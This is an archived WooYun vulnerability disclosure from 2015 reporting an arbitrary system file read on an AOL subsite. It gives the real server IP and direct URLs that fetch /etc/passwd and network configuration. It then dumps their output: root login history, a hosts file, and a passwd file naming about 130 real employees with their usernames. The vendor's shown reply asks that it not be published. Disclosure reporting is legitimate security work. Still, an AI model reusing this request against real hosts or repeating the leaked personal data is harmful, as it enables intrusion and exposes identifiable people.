乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-03: 细节已通知厂商并且等待厂商处理中 2015-02-05: 厂商已经确认,细节仅向厂商公开 2015-02-15: 细节向核心白帽子及相关领域专家公开 2015-02-25: 细节向普通白帽子公开 2015-03-07: 细节向实习白帽子公开 2015-03-20: 细节向公众公开
AOL某分站任意系统文件读取漏洞
https://www.shodan.io/host/149.174.97.92
149.174.97.92http://huffsmith-shared-a-atc.evip.aol.com/
last
root pts/0 jenkins-m01.ihos Sat Jan 24 06:48 - 06:48 (00:00) root pts/0 jenkins-m01.ihos Sat Jan 24 06:48 - 06:48 (00:00) root pts/0 jenkins-m01.ihos Wed Jan 7 00:48 - 00:48 (00:00) root pts/0 jenkins-m01.ihos Wed Jan 7 00:48 - 00:48 (00:00) root pts/0 jenkins-m01.ihos Wed Jan 7 00:37 - 00:37 (00:00) root pts/0 jenkins-m01.ihos Wed Jan 7 00:37 - 00:37 (00:00) root pts/0 jenkins-m01.ihos Tue Dec 23 14:27 - 14:27 (00:00) root pts/0 jenkins-m01.ihos Tue Dec 23 14:27 - 14:27 (00:00) root pts/0 jenkins-m01.ihos Tue Dec 23 14:21 - 14:21 (00:00) root pts/0 jenkins-m01.ihos Tue Dec 23 14:21 - 14:21 (00:00) reboot system boot 2.6.32-431.20.5. Thu Oct 9 23:33 - 02:36 (107+03:03) root pts/0 jenkins-m01.ihos Wed Oct 1 02:49 - 02:49 (00:00) root pts/0 jenkins-m01.ihos Wed Oct 1 02:49 - 02:49 (00:00) root pts/0 jenkins-m01.ihos Tue Sep 30 23:21 - 23:22 (00:00) root pts/0 jenkins-m01.ihos Tue Sep 30 23:21 - 23:21 (00:00) root pts/0 jenkins-m01.ihos Tue Sep 30 05:38 - 05:40 (00:01) root pts/0 jenkins-m01.ihos Tue Sep 30 05:38 - 05:38 (00:00) root pts/0 jenkins-m01.ihos Fri Aug 22 22:29 - 22:29 (00:00) root pts/0 jenkins-m01.ihos Fri Aug 22 22:29 - 22:29 (00:00) root pts/0 jenkins-m01.ihos Tue Aug 12 11:47 - 11:47 (00:00) root pts/0 jenkins-m01.ihos Tue Aug 12 11:47 - 11:47 (00:00) root pts/0 jenkins-m01.ihos Tue Aug 12 11:42 - 11:42 (00:00) root pts/0 jenkins-m01.ihos Tue Aug 12 11:42 - 11:42 (00:00) root pts/0 jenkins-m01.ihos Fri Aug 1 23:39 - 23:40 (00:01) root pts/0 jenkins-m01.ihos Fri Aug 1 23:39 - 23:39 (00:00) root pts/0 jenkins-m01.ihos Fri Aug 1 00:15 - 00:16 (00:01) root pts/0 jenkins-m01.ihos Fri Aug 1 00:15 - 00:15 (00:00) root pts/0 jenkins-m01.ihos Tue Jul 29 06:13 - 06:14 (00:01) root pts/0 jenkins-m01.ihos Tue Jul 29 06:13 - 06:13 (00:00) root pts/0 jenkins-m01.ihos Mon Jul 28 22:53 - 22:55 (00:01)
http://149.174.97.92/etc/sysconfig/network
NETWORKING=yesNETWORKING_IPV6=noHOSTNAME=amp-prod-blogside-a108.ihost.aol.comGATEWAY=205.188.29.254
http://149.174.97.92/etc/passwd
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinpostgres:x:26:26:PostgreSQL Server User:/home/postgres:/bin/bashmysql:x:27:27:Mysql User:/var/lib/mysql:/bin/bashnscd:x:28:28:NSCD Daemon:/:/bin/falserpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinsmmsp:x:51:51:smmsp mail user:/var/spool/mqueue:/dev/nullpiranha:x:60:60::/etc/sysconfig/ha:/dev/nullwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinavahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologindovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologincouchbase:x:477:494:couchbase system user:/opt/couchbase:/bin/shkim:x:478:1026:Kim Brennan:/home/kim:/bin/bashsaslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologinabrt:x:499:499::/etc/abrt:/sbin/nologinshallett:x:781:1026:Stephen Hallett:/home/shallett:/bin/bashzhou:x:945:1035:Yingying Zhou:/home/zhou:/bin/bashruss:x:1833:1026:Russ DeLuca:/home/russ:/bin/bashprjones:x:2308:1026:Peter Jones:/home/prjones:/bin/bashlshoang:x:2386:1026:Lynn Hoang:/home/lshoang:/bin/bashsaunders:x:2597:1026:James Saunders:/home/saunders:/bin/bashtpitts:x:2758:11062:Tom Pitts:/home/tpitts:/bin/bashjingwu:x:3017:1026:Jing Wu:/home/jingwu:/bin/bashkpettit:x:4572:1026:Kevin Pettit:/home/kpettit:/bin/bashdesaia:x:4700:20:Ed Desai:/home/desaia:/bin/bashstolfi:x:4798:1026:Chris Stolfi:/home/stolfi:/bin/bashvvsaxena:x:5175:1026:Vishal Saxena:/home/vvsaxena:/bin/bashmmiranda:x:5217:1026:Maxie Miranda:/home/mmiranda:/bin/basheddeegan:x:5471:951:Edward Deegan:/home/eddeegan:/bin/bashzgrodek:x:5479:1026:Renee Sribar:/home/zgrodek:/bin/bashdhunn:x:5562:1026:David Hunninen:/home/dhunn:/bin/bashtoni:x:5857:1026:Toni Sanavullah:/home/toni:/bin/bashpvelez:x:6012:1026:Peter Velez:/home/pvelez:/bin/bashcolmg:x:6077:1026:Colm Geraghty:/home/colmg:/bin/bashmfbma:x:6529:1026:Brian Ayala:/home/mfbma:/bin/bashrodneyp:x:6598:1026:Rodney Plomp:/home/rodneyp:/bin/bashzhanglu:x:6817:60:Zhang Lu:/home/zhanglu:/bin/bashmthornto:x:6933:1026:Michael Thornton:/home/mthornto:/bin/bashstokesrk:x:7358:1026:Robb Stokes:/home/stokesrk:/bin/bashgearoidr:x:7841:1026:Gearoid Rogers:/home/gearoidr:/bin/bashbduddy:x:8565:1026:Brian Duddy:/home/bduddy:/bin/bashroperry:x:8711:1026:Bobby Perry:/home/roperry:/bin/bashwilljw:x:8815:1026:William Won:/home/willjw:/bin/bashian:x:9035:1026:Ian Nakamura:/home/ian:/bin/bashmdunbar:x:9148:1026:Matthew Dunbar:/home/mdunbar:/bin/bashpemkes:x:9438:1026:Paul Emkes:/home/pemkes:/bin/bashwalkert:x:9546:1026:Travis Walker:/home/walkert:/bin/bashshawnc:x:9995:1026:Shawn Carnell:/home/shawnc:/bin/bashcgreen:x:12029:1026:Carl Green:/home/cgreen:/bin/bashamico:x:12858:1026:John Amico:/home/amico:/bin/bashvroytman:x:12955:1026:Vladimir Roytman:/home/vroytman:/bin/bashjobi:x:13695:1026:JOBI:/home/jobi:/bin/bashzacd:x:14432:1026:Zacariah DeLesDernier:/home/zacd:/bin/bashpatrickf:x:14495:1026:Patrick Fitzsimons:/home/patrickf:/bin/bashmhanick:x:14789:1026:Mark Hanick:/home/mhanick:/bin/bashimdbg:x:15272:1018:Brandon Goode:/home/imdbg:/bin/bashjcain:x:16226:1026:Justin Cain:/home/jcain:/bin/bashjcrane:x:16477:1026:Jonathan Crane:/home/jcrane:/bin/bashshashik:x:16730:1026:Shashikiran Reddy:/home/shashik:/bin/bashcfleming:x:16960:1026:Christopher Fleming:/home/cfleming:/bin/bashckhouri5:x:17613:1026:Christoph Khouri:/home/ckhouri5:/bin/bashtaraschk:x:17630:1026:Matthew Taraschke:/home/taraschk:/bin/bashmohamed1:x:18676:1026:Mohamed Osman:/home/mohamed1:/bin/bashdpadmin:x:18734:11337:PCS dpadmin:/home/dpadmin:/bin/bashmalang1:x:19148:1026:Suhale Malang Khader:/home/malang1:/bin/bashmadhurao:x:19238:1026:Madhusudan Rao:/home/madhurao:/bin/bashsameer6:x:19464:1026:Sameer Patel:/home/sameer6:/bin/bashrameshk2:x:19517:1026:Ramesh Kumar R:/home/rameshk2:/bin/bashamitv:x:19573:1026:Amit Varde:/home/amitv:/bin/bashgopinath:x:20352:1026:Gopinath Kalidass:/home/gopinath:/bin/bashartz:x:20549:1026:Dave Artz:/home/artz:/bin/bashvenug:x:21433:1026:Venu Vejandla:/home/venug:/bin/bashkkumar:x:21499:1026:Krishnakumar Subramanian:/home/kkumar:/bin/bashrpokhare:x:21654:1026:Ranjan Pokharel:/home/rpokhare:/bin/bashjannotta:x:21752:1026:Jeremy Jannotta:/home/jannotta:/bin/bashmongodb:x:21780:11593:Default mongodb for COI:/home/mongodb:/bin/bashnate:x:21870:1026:Nate Eagle:/home/nate:/bin/zshandykahn:x:22001:1026:Andy Kahn:/home/andykahn:/bin/bashjmurillo:x:22092:1026:Jady Murillo:/home/jmurillo:/bin/bashptivnan:x:22109:1026:Patrick Tivnan:/home/ptivnan:/bin/bashgroman00:x:22117:1026:Greg Roman:/home/groman00:/bin/bashrexfury:x:22207:1026:James Diss:/home/rexfury:/bin/bashsparksm:x:22216:1026:Michael Sparks:/home/sparksm:/bin/zshabudri11:x:22306:1026:Abdullah Budri:/home/abudri11:/bin/bashloglesby:x:22344:1026:Leah Oglesby:/home/loglesby:/bin/bashgeorgew:x:22451:1026:George Henry Whitesides III:/home/georgew:/bin/bashphilipt:x:22486:1026:Tina Philip:/home/philipt:/bin/bashscharles:x:22527:1026:Charles Sinclair:/home/scharles:/bin/bashaminel:x:22543:1026:Amine Louati:/home/aminel:/bin/bashctoby:x:22546:1026:Cindy Toby:/home/ctoby:/bin/bashjcobb29:x:22623:1026:Justin Cobb:/home/jcobb29:/bin/bashskunchak:x:22642:1026:Sivaprasad Kunchakuri:/home/skunchak:/bin/bashbhashimi:x:22647:1026:Belal Hashimi:/home/bhashimi:/bin/bashpaulv:x:22734:1026:Paul Vuchetich:/home/paulv:/bin/bashrkhattar:x:22739:1026:Ralph Khattar:/home/rkhattar:/bin/bashbbarek:x:22769:1026:Bahier Barekzoy:/home/bbarek:/bin/bashimran12:x:22771:1026:Imran Hoosain:/home/imran12:/bin/basheamoncc:x:22798:1026:Eamon McCormack:/home/eamoncc:/bin/bashdsegall:x:22887:1026:Daniel Segall:/home/dsegall:/bin/bashameira:x:22930:1026:Ameir Abdeldayem:/home/ameira:/bin/bashphanin:x:23037:1026:Phanindra Golkonda:/home/phanin:/bin/basheladamit:x:23051:1026:Elad Amit:/home/eladamit:/bin/bashewolk:x:23132:1026:Ethan Wolkowicz:/home/ewolk:/bin/bashsrimola:x:23264:1026:Stefan Rimola:/home/srimola:/bin/bashampsmith:x:23387:1026:Jacob Smith:/home/ampsmith:/bin/bashzkelly44:x:23432:1026:ZacK Kelly:/home/zkelly44:/bin/bashronnys:x:23444:1026:Ronny Sapir:/home/ronnys:/bin/bashjdesmet:x:23549:1026:Jordan Desmet:/home/jdesmet:/bin/bashaverkhov:x:23639:1026:Alex Verkhovtsev:/home/averkhov:/bin/bashalonbeck:x:23657:1026:Alon Becker:/home/alonbeck:/bin/bashniquesh2:x:23666:1026:Shanique Davis:/home/niquesh2:/bin/bashadwilli:x:23696:1026:Adrian Williams:/home/adwilli:/bin/bashsamquin:x:23725:1026:Samantha Quinones:/home/samquin:/bin/bashehanit14:x:23768:1026:Erez Hanit:/home/ehanit14:/bin/bashccannell:x:23782:1026:Chad Cannell:/home/ccannell:/bin/bashchensha:x:23794:1026:Chen Shaulian:/home/chensha:/bin/bashnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
# Do not remove the following line, or various programs# that require network functionality will fail.127.0.0.1 localhost.localdomain localhost149.174.108.111 amp-prod-blogside-a114.ihost.aol.com amp-prod-blogside-a114.ihost.aol amp-prod-blogside-a114.ihost amp-prod-blogside-a114
重新配置
危害等级:中
漏洞Rank:6
确认时间:2015-02-05 02:42
2015-02-05:Please remove this link and do NOT publish this vulnerability until we have had a chance to correct the issue.